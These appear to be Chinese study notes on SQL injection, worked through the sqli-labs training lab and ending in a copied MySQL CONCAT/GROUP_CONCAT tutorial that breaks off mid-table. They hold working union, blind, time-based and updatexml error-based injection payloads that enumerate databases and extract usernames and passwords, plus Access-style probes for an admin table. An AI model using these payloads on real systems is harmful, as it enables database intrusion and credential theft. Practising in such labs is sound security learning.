查库

select schema_name from information_schema.schemata

查表

select table_name from information_schema.tables where table_schema='security'

查列

select column_name from information_schema.columns where table_name='users'

查字段

select username,password from security.users

sqli-lib实践

less-01:
SELECT * FROM users WHERE id='1' LIMIT 0,1;
select SELECT
limit 0,1; 其中第一位是从第几个开始,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据。

SELECT * FROM users WHERE id='1' or 1=1-- ' LIMIT 0,1
--+ -- #
or and
A and B True
A or B True True
id=1
SELECT * FROM users WHERE id='1''
less-01
数据中存在3列。


system_user()
user()
current_user()
database()
version()
@@datadir
@@version_compile_os

group_concat()
concat_ws('~',A,B)
A~B


information_schema,challenges,mysql,performance_schema,security,test
security
emails,referers,uagents,users
id,username,password


group_concat(concat_ws(0x7e,username,password)) from security.users

concat_ws(0x7e,username,password) # admin~password,admin1~pass,

'1'
1
('1')

select ascii(substr((select database()),1,1));
select database() security
select ascii(substr(security),1,1));
select ascii('s')
115

burpsuite 使用: 代理
security
crow_1
if length(select database()) =8;

http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 0x7365637572697479 limit 1,1),1,1))> 10--+
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
http://127.0.0.1/sqli/Less-5/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >1000--+

ascii(substr((select database()),1,1))> 156
security
二分法
1,156
100

http://127.0.0.1/sqli/Less-5/?id=1'
and
ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10
99
--+

select if()
select database()
substr((select database()),1,1)
ascii(substr((select database()),1,1))
select if(ascii(substr((select database()),1,1)) > 10, 2,3);

sqli-labs less01-less10
mysql 查询语句:

查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema='security';
查列: select column_name from information_schema.columns where table_name='users';
查字段: select username,password from security.users;

less-11

select 1=1 and 1=2;
select 1=1 or 1=2;
uname=n' union select 1, schema_name from information_schema.schemata limit 1,1#&passwd=admin&submit=Submit
uname=n' union select 1, group_concat(schema_name) from information_schema.schemata #&passwd=admin&submit=Submit
security
uname=n' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=admin&submit=Submit
总结:
less-1 get
less-11 post
(1)

'
')
'))
"
")
"))
select * from users where user_id = '1';
select * from users where user_id = '1111 ' or 1=1 #
select database();
group_concat(concat(0x7e,username,password)) from security.users
~
username~password

less-13
select length(database());
if()
长度:if(length(database())>1,1,sleep(5)); 数据库字符长度是8
left(database(),1)='a'

uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit
inf
A-Z
0_9
_


less-14
uname=admin " or length(database())='8'#&passwd=admin&submit=Submit
A or B
A and B

uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit

less-15
uname=admin&passwd=a' or length(database())='8'#&submit=Submit

less-16
13 ('ain')
14 "admin"
15 'ain'
16 ("admin")
uname=admin&passwd=admin") and 1=2#&submit=Submit

less-17
uname=admin&passwd=afafa'#&submit=Submit
select updatexml(1,concat(0x7e,(database())),1);
select updatexml(1,concat(0x7e,(构造语句)),1);
查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema='security';
查列: select column_name from information_schema.columns where table_name='users';
查字段: select username,password from security.users;
and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1)

less-18
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('Mn.0', '127.0.0.1', 'admin')
' or updatexml(1,concat(0x7e,()),1);
select updatexml(1,concat(0x7e,(database())),1);
' or updatexml(1,concat(0x7e,(database())),1) or '1'='1
' or updatexml(1,concat(0x7e,(database())),1), '','')#
' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1), '','')#
' or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), '','')#

16进制

0x + Hex Encode	 		

手工注入

2%'and(select count(*)from mssysaccessobjects)>0 and '%'=' //返回正常,access數據庫
2%'and(select count(*)from admin_user)>0 and '%'=' //返回正常,存在admin_user表
2%'and(select count(username)from admin_user)>0 and '%'=' //返回正常,存在username字段
2%'and(select count(password)from admin_user)>0 and '%'=' //返回正常,存在password字段
2%'and(select top 1 len(admin)from admin_user)>4 and '%'=' //返回正常,username長度大於4

Mysql中concat()、concat_ws()和 group_concat()的用法

一、CONCAT()函数

CONCAT()函数用于将多个字符串连接成一个字符串。
使用数据表Info作为示例,其中SELECT id,name FROM info LIMIT 1;的返回结果为

+----+--------+
| id | name |
+----+--------+
| 1 | BioCyc |
+----+--------+
1、语法及使用特点:

CONCAT(str1,str2,…)
返回结果为连接参数产生的字符串。如有任何一个参数为NULL ,则返回值为 NULL。可以有一个或多个参数。

2、使用示例:
SELECT CONCAT(id, ‘,’, name) AS con FROM info LIMIT 1; $ 返回结果为
+----------+
| con |
+----------+
| 1,BioCyc |
+----------+
SELECT CONCAT(‘My’, NULL, ‘QL’); # 返回结果为
+--------------------------+
| CONCAT('My', NULL, 'QL') |
+--------------------------+
| NULL |
+--------------------------+
3、如何指定参数之间的分隔符

使用函数CONCAT_WS()。使用语法为:CONCAT_WS(separator,str1,str2,…)
CONCAT_WS() 代表 CONCAT With Separator ,是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。如果分隔符为 NULL,则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。但是CONCAT_WS()不会忽略任何空字符串。 (然而会忽略所有的 NULL)。

如SELECT CONCAT_WS('_',id,name) AS con_ws FROM info LIMIT 1;返回结果为
+----------+
| con_ws |
+----------+
| 1_BioCyc |
+----------+

SELECT CONCAT_WS(',','First name',NULL,'Last Name');返回结果为
+----------------------------------------------+
| CONCAT_WS(',','First name',NULL,'Last Name') |
+----------------------------------------------+
| First name,Last Name |
+----------------------------------------------+

二、GROUP_CONCAT()函数

GROUP_CONCAT函数返回一个字符串结果,该结果由分组中的值连接组合而成。
使用表info作为示例,其中语句

SELECT locus,id,journal FROM info WHERE locus IN('AB086827','AF040764');的返回结果为
+----------+----+--------------------------+
| locus | id | journal |
+----------+----+--------------------------+
| AB086827 | 1 | Unpublished |
| AB086827 | 2 | Submitted (20-JUN-2002) |
| AF040764 | 23 | Unpublished |
| AF040764 | 24 | Submitted (31-DEC-1997) |
+----------+----+--------------------------+
1、使用语法及特点:
GROUP_CONCAT([DISTINCT] expr [,expr ...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] [,col ...]]
[SEPARATOR str_val])

MySQL 中,你可以得到表达式结合体的连结值。通过使用 DISTINCT 可以排除重复值。如果希望对结果中的值进行排序,可以使用 ORDER BY 子句。
SEPARATOR 是一个字符串值,它被用于插入到结果值中。缺省为一个逗号 (","),可以通过指定 SEPARATOR "" 完全地移除这个分隔符。
可以通过变量 group_concat_max_len 设置一个最大的长度。在运行时执行的句法如下:
SET [SESSION | GLOBAL] group_concat_max_len = unsigned_integer;
如果最大长度被设置,结果值被剪切到这个最大长度。如果分组的字符过长,可以对系统参数进行设置:
SET @@global.group_concat_max_len=40000;

2、使用示例:

语句 SELECT locus,GROUP_CONCAT(id) FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus; 的返回结果为

+----------+------------------+
| locus | GROUP_CONCAT(id) |
+----------+------------------+
| AB086827 | 1,2 |
| AF040764 | 23,24 |
+----------+------------------+

语句 SELECT locus,GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;的返回结果为

+----------+----------------------------------------------------------+
| locus | GROUP_CONCAT(distinct id ORDER BY id DESC SEPARATOR '_') |
+----------+----------------------------------------------------------+
| AB086827 | 2_1 |
| AF040764 | 24_23 |
+----------+----------------------------------------------------------+

语句SELECT locus,GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') FROM info WHERE locus IN('AB086827','AF040764') GROUP BY locus;的返回结果为

+----------+--------------------------------------------------------------------------+
| locus | GROUP_CONCAT(concat_ws(', ',id,journal) ORDER BY id DESC SEPARATOR '. ') |
+----------+--------------------------------------------------------------------------+
| AB086827 | 2, Submitted (20-JUN-2002). 1, Unpublished |
| AF040764 | 24, Submitted (31-DEC-1997) . 23, Unpublished |
+----------+--------------------------------------------------------------------------